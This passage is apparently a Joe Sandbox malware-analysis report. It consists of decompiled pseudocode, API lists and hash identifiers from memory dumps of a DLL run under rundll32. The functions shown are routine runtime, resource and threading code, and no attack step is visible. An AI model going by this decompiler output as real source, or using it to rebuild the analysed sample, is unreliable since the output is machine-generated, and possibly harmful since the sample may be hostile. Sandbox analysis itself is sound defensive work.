                                                                                                                                                                            				void* _t51;
                                                                                                                                                                            				void* _t64;
                                                                                                                                                                            				void* _t65;
                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                            				void* _t68;
                                                                                                                                                                            				void* _t70;
                                                                                                                                                                            
                                                                                                                                                                            				_t65 = __edi;
                                                                                                                                                                            				_t64 = __edx;
                                                                                                                                                                            				_t51 = E1000D61F(_t50, __ecx, __edi, _t68, __eflags);
                                                                                                                                                                            				_t29 =  *((intOrPtr*)(_t51 + 0x10));
                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                            					L19:
                                                                                                                                                                            					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t32 = _t29 - 1;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
                                                                                                                                                                            				if(_t32 != 0) {
                                                                                                                                                                            					goto L19;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_a4 == 0) {
                                                                                                                                                                            					L8:
                                                                                                                                                                            					_push(_t65);
                                                                                                                                                                            					_t66 =  *((intOrPtr*)(E1000D5EC(_t51, _t65, 0, _t77) + 4));
                                                                                                                                                                            					_t70 = E100139DB(0x10058f44);
                                                                                                                                                                            					if(_t70 == 0 || _t66 == 0) {
                                                                                                                                                                            						L18:
                                                                                                                                                                            						goto L19;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t35 =  *((intOrPtr*)(_t70 + 0xc));
                                                                                                                                                                            						_t80 = _t35;
                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                            							L12:
                                                                                                                                                                            							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
                                                                                                                                                                            								_t36 =  *((intOrPtr*)(_t70 + 0xc));
                                                                                                                                                                            								_a4 = _a4 & 0x00000000;
                                                                                                                                                                            								_t83 = _t36;
                                                                                                                                                                            								if(_t36 != 0) {
                                                                                                                                                                            									_push(_t36);
                                                                                                                                                                            									_t39 = E1001A023(_t51, _t64, _t66, _t70, _t83);
                                                                                                                                                                            									_push( *((intOrPtr*)(_t70 + 0xc)));
                                                                                                                                                                            									_a4 = _t39;
                                                                                                                                                                            									E10016380(_t51, _t66, _t70, _t83);
                                                                                                                                                                            								}
                                                                                                                                                                            								_t37 = E1001703B(_t51, _t64, _t66, _t70,  *((intOrPtr*)(_t66 + 0x98)));
                                                                                                                                                                            								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
                                                                                                                                                                            								if(_t37 == 0 && _a4 != _t37) {
                                                                                                                                                                            									 *((intOrPtr*)(_t70 + 0xc)) = E1001703B(_t51, _t64, _t66, _t70, _a4);
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L18;
                                                                                                                                                                            						}
                                                                                                                                                                            						_push(_t35);
                                                                                                                                                                            						if(E1001A023(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
                                                                                                                                                                            							goto L18;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L12;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_a4 != 0xffffffff) {
                                                                                                                                                                            					_t47 = E1000B510();
                                                                                                                                                                            					if(_t47 != 0) {
                                                                                                                                                                            						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
                                                                                                                                                                            						_t77 = _t48;
                                                                                                                                                                            						if(_t48 != 0) {
                                                                                                                                                                            							 *_t48(0, 0);
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				E100144ED( *((intOrPtr*)(_t51 + 0x20)), _t65);
                                                                                                                                                                            				E100144ED( *((intOrPtr*)(_t51 + 0x1c)), _t65);
                                                                                                                                                                            				E100144ED( *((intOrPtr*)(_t51 + 0x18)), _t65);
                                                                                                                                                                            				E100144ED( *((intOrPtr*)(_t51 + 0x14)), _t65);
                                                                                                                                                                            				E100144ED( *((intOrPtr*)(_t51 + 0x24)), _t65);
                                                                                                                                                                            				goto L8;
                                                                                                                                                                            			}





















                                                                                                                                                                            0x100145b9
                                                                                                                                                                            0x100145b9
                                                                                                                                                                            0x100145c3
                                                                                                                                                                            0x100145c5
                                                                                                                                                                            0x100145cc
                                                                                                                                                                            0x100146a4
                                                                                                                                                                            0x100146af
                                                                                                                                                                            0x100146af
                                                                                                                                                                            0x100145d2
                                                                                                                                                                            0x100145d5
                                                                                                                                                                            0x100145d8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100145e1
                                                                                                                                                                            0x10014625
                                                                                                                                                                            0x10014625
                                                                                                                                                                            0x1001462b
                                                                                                                                                                            0x10014638
                                                                                                                                                                            0x1001463c
                                                                                                                                                                            0x100146a3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014642
                                                                                                                                                                            0x10014642
                                                                                                                                                                            0x10014645
                                                                                                                                                                            0x10014647
                                                                                                                                                                            0x10014658
                                                                                                                                                                            0x1001465f
                                                                                                                                                                            0x10014661
                                                                                                                                                                            0x10014664
                                                                                                                                                                            0x10014668
                                                                                                                                                                            0x1001466a
                                                                                                                                                                            0x1001466c
                                                                                                                                                                            0x1001466d
                                                                                                                                                                            0x10014672
                                                                                                                                                                            0x10014675
                                                                                                                                                                            0x10014678
                                                                                                                                                                            0x1001467e
                                                                                                                                                                            0x10014685
                                                                                                                                                                            0x1001468d
                                                                                                                                                                            0x10014690
                                                                                                                                                                            0x100146a0
                                                                                                                                                                            0x100146a0
                                                                                                                                                                            0x10014690
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001465f
                                                                                                                                                                            0x10014649
                                                                                                                                                                            0x10014656
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014656
                                                                                                                                                                            0x1001463c
                                                                                                                                                                            0x100145e7
                                                                                                                                                                            0x100145e9
                                                                                                                                                                            0x100145f0
                                                                                                                                                                            0x100145f2
                                                                                                                                                                            0x100145f5
                                                                                                                                                                            0x100145f7
                                                                                                                                                                            0x100145fb
                                                                                                                                                                            0x100145fb
                                                                                                                                                                            0x100145f7
                                                                                                                                                                            0x100145f0
                                                                                                                                                                            0x10014600
                                                                                                                                                                            0x10014608
                                                                                                                                                                            0x10014610
                                                                                                                                                                            0x10014618
                                                                                                                                                                            0x10014620
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __msize_malloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1288803200-0
                                                                                                                                                                            • Opcode ID: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
                                                                                                                                                                            • Instruction ID: c51f58ba7030090f65d8388f2f6216d6b95cef8c4540db251b535ec9dede0d79
                                                                                                                                                                            • Opcode Fuzzy Hash: f4a42d07282e480ba19c61c33f8d9b2ab7007992bfdb09378e69a2fee1890d3d
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E21F375500A019FCB55DF34D881B5A73E4FF05298B22842AE869DF266DF30ECC1CB82
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                            			E10009D34(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
                                                                                                                                                                            				intOrPtr* _v0;
                                                                                                                                                                            				void* _v4;
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                            				void* _t20;
                                                                                                                                                                            				intOrPtr* _t23;
                                                                                                                                                                            				void* _t29;
                                                                                                                                                                            				void* _t31;
                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                            				char _t36;
                                                                                                                                                                            				void* _t40;
                                                                                                                                                                            				void* _t42;
                                                                                                                                                                            				void* _t44;
                                                                                                                                                                            
                                                                                                                                                                            				_t44 = __eflags;
                                                                                                                                                                            				_t38 = __esi;
                                                                                                                                                                            				_t37 = __edi;
                                                                                                                                                                            				_t31 = __ebx;
                                                                                                                                                                            				_push(4);
                                                                                                                                                                            				E10017BC1(E10027DA5, __ebx, __edi, __esi);
                                                                                                                                                                            				_t35 = E10009B91(_t44, 0xc);
                                                                                                                                                                            				_v16 = _t35;
                                                                                                                                                                            				_t20 = 0;
                                                                                                                                                                            				_v4 = 0;
                                                                                                                                                                            				if(_t35 != 0) {
                                                                                                                                                                            					_t20 = E10009CDE(_t35);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t36 = _a4;
                                                                                                                                                                            				_v8 = _v8 | 0xffffffff;
                                                                                                                                                                            				 *((intOrPtr*)(_t20 + 8)) = _t36;
                                                                                                                                                                            				_a4 = _t20;
                                                                                                                                                                            				E10017C83( &_a4, 0x1002e16c);
                                                                                                                                                                            				asm("int3");
                                                                                                                                                                            				_t40 = _t42;
                                                                                                                                                                            				_t23 = _v0;
                                                                                                                                                                            				_push(_t31);
                                                                                                                                                                            				if(_t23 != 0) {
                                                                                                                                                                            					 *_t23 = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
                                                                                                                                                                            					E10009C0D(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
                                                                                                                                                                            					LocalFree(_a12);
                                                                                                                                                                            					_t29 = 1;
                                                                                                                                                                            					__eflags = 1;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					 *_a4 = 0;
                                                                                                                                                                            					_t29 = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t29;
                                                                                                                                                                            			}
















                                                                                                                                                                            0x10009d34
                                                                                                                                                                            0x10009d34
                                                                                                                                                                            0x10009d34
                                                                                                                                                                            0x10009d34
                                                                                                                                                                            0x10009d34
                                                                                                                                                                            0x10009d3b
                                                                                                                                                                            0x10009d48
                                                                                                                                                                            0x10009d4a
                                                                                                                                                                            0x10009d4d
                                                                                                                                                                            0x10009d51
                                                                                                                                                                            0x10009d54
                                                                                                                                                                            0x10009d56
                                                                                                                                                                            0x10009d56
                                                                                                                                                                            0x10009d5b
                                                                                                                                                                            0x10009d5e
                                                                                                                                                                            0x10009d62
                                                                                                                                                                            0x10009d65
                                                                                                                                                                            0x10009d71
                                                                                                                                                                            0x10009d76
                                                                                                                                                                            0x10009d78
                                                                                                                                                                            0x10009d7a
                                                                                                                                                                            0x10009d7d
                                                                                                                                                                            0x10009d82
                                                                                                                                                                            0x10009d84
                                                                                                                                                                            0x10009d84
                                                                                                                                                                            0x10009da2
                                                                                                                                                                            0x10009db8
                                                                                                                                                                            0x10009dc3
                                                                                                                                                                            0x10009dcb
                                                                                                                                                                            0x10009dcb
                                                                                                                                                                            0x10009da4
                                                                                                                                                                            0x10009da7
                                                                                                                                                                            0x10009da9
                                                                                                                                                                            0x10009da9
                                                                                                                                                                            0x10009dce

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10009D3B
                                                                                                                                                                              • Part of subcall function 10009B91: _malloc.LIBCMT ref: 10009BAB
                                                                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 10009D71
                                                                                                                                                                            • FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,1002E16C,00000004,1000105C,8007000E), ref: 10009D9A
                                                                                                                                                                              • Part of subcall function 10009C0D: _wctomb_s.LIBCMT ref: 10009C1D
                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 10009DC3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1615547351-0
                                                                                                                                                                            • Opcode ID: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
                                                                                                                                                                            • Instruction ID: 2087144037a306e6c8b96e697859ee983d4da7c50e84c085b7e4f49f0a09e647
                                                                                                                                                                            • Opcode Fuzzy Hash: e381bce633557ad048b1696ea26053178c542294b2cd97fac3bd263aaafec7a1
                                                                                                                                                                            • Instruction Fuzzy Hash: 1E1170B1644249AFEB00DFA4DC81DAE3BA9FB04390F21452AF629CA1D1D731D9508B51
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                            			E1000C887(void* __ecx) {
                                                                                                                                                                            				void* _v8;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                            				void* _t28;
                                                                                                                                                                            				void* _t30;
                                                                                                                                                                            				struct HINSTANCE__* _t32;
                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                            				signed short _t35;
                                                                                                                                                                            				void* _t37;
                                                                                                                                                                            				signed short* _t40;
                                                                                                                                                                            
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				_push(_t28);
                                                                                                                                                                            				_t37 = __ecx;
                                                                                                                                                                            				_t42 =  *((intOrPtr*)(__ecx + 0x58));
                                                                                                                                                                            				_t40 =  *(__ecx + 0x60);
                                                                                                                                                                            				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
                                                                                                                                                                            					_t32 =  *(E1000D5EC(_t28, __ecx, _t40, _t42) + 0xc);
                                                                                                                                                                            					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
                                                                                                                                                                            				}
                                                                                                                                                                            				if(_v8 != 0) {
                                                                                                                                                                            					_t40 = LockResource(_v8);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t30 = 1;
                                                                                                                                                                            				if(_t40 != 0) {
                                                                                                                                                                            					_t35 =  *_t40;
                                                                                                                                                                            					if(_t40[1] != 0xffff) {
                                                                                                                                                                            						_t23 = _t40[5] & 0x0000ffff;
                                                                                                                                                                            						_t34 = _t40[6] & 0x0000ffff;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t35 = _t40[6];
                                                                                                                                                                            						_t23 = _t40[9] & 0x0000ffff;
                                                                                                                                                                            						_t34 = _t40[0xa] & 0x0000ffff;
                                                                                                                                                                            					}
                                                                                                                                                                            					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
                                                                                                                                                                            						_t30 = 0;
                                                                                                                                                                            					}
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *(_t37 + 0x58) != 0) {
                                                                                                                                                                            					FreeResource(_v8);
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t30;
                                                                                                                                                                            			}
















                                                                                                                                                                            0x1000c88a
                                                                                                                                                                            0x1000c88b
                                                                                                                                                                            0x1000c88e
                                                                                                                                                                            0x1000c890
                                                                                                                                                                            0x1000c897
                                                                                                                                                                            0x1000c89a
                                                                                                                                                                            0x1000c89d
                                                                                                                                                                            0x1000c8a4
                                                                                                                                                                            0x1000c8bb
                                                                                                                                                                            0x1000c8bb
                                                                                                                                                                            0x1000c8c2
                                                                                                                                                                            0x1000c8cd
                                                                                                                                                                            0x1000c8cd
                                                                                                                                                                            0x1000c8d1
                                                                                                                                                                            0x1000c8d4
                                                                                                                                                                            0x1000c8dc
                                                                                                                                                                            0x1000c8de
                                                                                                                                                                            0x1000c8ed
                                                                                                                                                                            0x1000c8f1
                                                                                                                                                                            0x1000c8e0
                                                                                                                                                                            0x1000c8e0
                                                                                                                                                                            0x1000c8e3
                                                                                                                                                                            0x1000c8e7
                                                                                                                                                                            0x1000c8e7
                                                                                                                                                                            0x1000c8fa
                                                                                                                                                                            0x1000c906
                                                                                                                                                                            0x1000c906
                                                                                                                                                                            0x1000c8fa
                                                                                                                                                                            0x1000c90c
                                                                                                                                                                            0x1000c911
                                                                                                                                                                            0x1000c911
                                                                                                                                                                            0x1000c91d

                                                                                                                                                                            APIs
                                                                                                                                                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1000C8AD
                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 1000C8B5
                                                                                                                                                                            • LockResource.KERNEL32(00000000), ref: 1000C8C7
                                                                                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1000C911
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1078018258-0
                                                                                                                                                                            • Opcode ID: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
                                                                                                                                                                            • Instruction ID: fb1a28c5f31200e3abd4209bdb6f3add133a5505808a0a6cde1b54a47ab738f1
                                                                                                                                                                            • Opcode Fuzzy Hash: ba0e54e7ba739e7dbb3db6c45d0c9dd504ce55cc39771a4365ee787ff2243026
                                                                                                                                                                            • Instruction Fuzzy Hash: 46118F3150076AEFE710DF95C889AAAB3F5FF003D5F218029E84252594D770ED50D760
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                            			E1000ADB5(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				void* _t37;
                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                            				void* _t45;
                                                                                                                                                                            				intOrPtr* _t51;
                                                                                                                                                                            				void* _t52;
                                                                                                                                                                            				void* _t53;
                                                                                                                                                                            
                                                                                                                                                                            				_t53 = __eflags;
                                                                                                                                                                            				_t46 = __ecx;
                                                                                                                                                                            				_t44 = __ebx;
                                                                                                                                                                            				_push(4);
                                                                                                                                                                            				E10017BC1(E10027E86, __ebx, __edi, __esi);
                                                                                                                                                                            				_t51 = __ecx;
                                                                                                                                                                            				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
                                                                                                                                                                            				E1000B862(__ebx, __ecx, __edi, __ecx, _t53);
                                                                                                                                                                            				_t54 =  *((intOrPtr*)(_t52 + 8));
                                                                                                                                                                            				 *((intOrPtr*)(_t52 - 4)) = 0;
                                                                                                                                                                            				 *_t51 = 0x10029f54;
                                                                                                                                                                            				if( *((intOrPtr*)(_t52 + 8)) == 0) {
                                                                                                                                                                            					 *((intOrPtr*)(_t51 + 0x50)) = 0;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t43 = E1001817A( *((intOrPtr*)(_t52 + 8)));
                                                                                                                                                                            					_pop(_t46);
                                                                                                                                                                            					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t45 = E1000D5EC(_t44, 0, _t51, _t54);
                                                                                                                                                                            				_t55 = _t45;
                                                                                                                                                                            				if(_t45 == 0) {
                                                                                                                                                                            					L4:
                                                                                                                                                                            					E1000A0DB(_t45, _t46, 0, _t51, _t55);
                                                                                                                                                                            				}
                                                                                                                                                                            				_t7 = _t45 + 0x74; // 0x74
                                                                                                                                                                            				_t46 = _t7;
                                                                                                                                                                            				_t37 = E1000AA21(_t45, _t7, 0, _t51, _t55);
                                                                                                                                                                            				if(_t37 == 0) {
                                                                                                                                                                            					goto L4;
                                                                                                                                                                            				}
                                                                                                                                                                            				 *((intOrPtr*)(_t37 + 4)) = _t51;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
                                                                                                                                                                            				 *((intOrPtr*)(_t45 + 4)) = _t51;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x44)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x64)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x68)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x54)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x60)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x88)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x58)) = 0;
                                                                                                                                                                            				 *((short*)(_t51 + 0x92)) = 0;
                                                                                                                                                                            				 *((short*)(_t51 + 0x90)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x48)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x80)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x84)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x70)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x74)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x94)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
                                                                                                                                                                            				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
                                                                                                                                                                            				return E10017C60(_t51);
                                                                                                                                                                            			}









                                                                                                                                                                            0x1000adb5
                                                                                                                                                                            0x1000adb5
                                                                                                                                                                            0x1000adb5
                                                                                                                                                                            0x1000adb5
                                                                                                                                                                            0x1000adbc
                                                                                                                                                                            0x1000adc1
                                                                                                                                                                            0x1000adc3
                                                                                                                                                                            0x1000adc6
                                                                                                                                                                            0x1000adcd
                                                                                                                                                                            0x1000add0
                                                                                                                                                                            0x1000add3
                                                                                                                                                                            0x1000add9
                                                                                                                                                                            0x1000ade9
                                                                                                                                                                            0x1000addb
                                                                                                                                                                            0x1000adde
                                                                                                                                                                            0x1000ade3
                                                                                                                                                                            0x1000ade4
                                                                                                                                                                            0x1000ade4
                                                                                                                                                                            0x1000adf1
                                                                                                                                                                            0x1000adf3
                                                                                                                                                                            0x1000adf5
                                                                                                                                                                            0x1000adf7
                                                                                                                                                                            0x1000adf7
                                                                                                                                                                            0x1000adf7
                                                                                                                                                                            0x1000adfc
                                                                                                                                                                            0x1000adfc
                                                                                                                                                                            0x1000adff
                                                                                                                                                                            0x1000ae06
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000ae08
                                                                                                                                                                            0x1000ae11
                                                                                                                                                                            0x1000ae1a
                                                                                                                                                                            0x1000ae1d
                                                                                                                                                                            0x1000ae20
                                                                                                                                                                            0x1000ae23
                                                                                                                                                                            0x1000ae26
                                                                                                                                                                            0x1000ae29
                                                                                                                                                                            0x1000ae2c
                                                                                                                                                                            0x1000ae2f
                                                                                                                                                                            0x1000ae32
                                                                                                                                                                            0x1000ae38
                                                                                                                                                                            0x1000ae3b
                                                                                                                                                                            0x1000ae42
                                                                                                                                                                            0x1000ae49
                                                                                                                                                                            0x1000ae4c
                                                                                                                                                                            0x1000ae52
                                                                                                                                                                            0x1000ae58
                                                                                                                                                                            0x1000ae5e
                                                                                                                                                                            0x1000ae61
                                                                                                                                                                            0x1000ae64
                                                                                                                                                                            0x1000ae6a
                                                                                                                                                                            0x1000ae70
                                                                                                                                                                            0x1000ae73
                                                                                                                                                                            0x1000ae76
                                                                                                                                                                            0x1000ae87

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 1000ADBC
                                                                                                                                                                              • Part of subcall function 1000B862: __EH_prolog3.LIBCMT ref: 1000B869
                                                                                                                                                                            • __strdup.LIBCMT ref: 1000ADDE
                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 1000AE0B
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 1000AE14
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4206445780-0
                                                                                                                                                                            • Opcode ID: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
                                                                                                                                                                            • Instruction ID: f8307bcc4145d2f3034cc24c4785684ef343d47fe4738e0b5029f7ba663f9659
                                                                                                                                                                            • Opcode Fuzzy Hash: 9c26e9d60202904c8b3007aba5d4454f2b931d5449d83442688f904a073da271
                                                                                                                                                                            • Instruction Fuzzy Hash: 88217EB4800B50CFE721DF6A858564AFBF8FFA4680F10891FD59A87A25CBB0A581CF45
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                            			E1001170E(intOrPtr* __ecx) {
                                                                                                                                                                            				char _v20;
                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				intOrPtr* __esi;
                                                                                                                                                                            				struct HWND__* _t18;
                                                                                                                                                                            				void* _t24;
                                                                                                                                                                            				intOrPtr _t29;
                                                                                                                                                                            				intOrPtr* _t33;
                                                                                                                                                                            
                                                                                                                                                                            				_t28 = __ecx;
                                                                                                                                                                            				_push(0);
                                                                                                                                                                            				_t33 = __ecx;
                                                                                                                                                                            				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
                                                                                                                                                                            					__eax =  *__esi;
                                                                                                                                                                            					__ecx = __esi;
                                                                                                                                                                            					__eax =  *((intOrPtr*)( *__esi + 0x170))();
                                                                                                                                                                            				}
                                                                                                                                                                            				_t30 = SendMessageA;
                                                                                                                                                                            				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
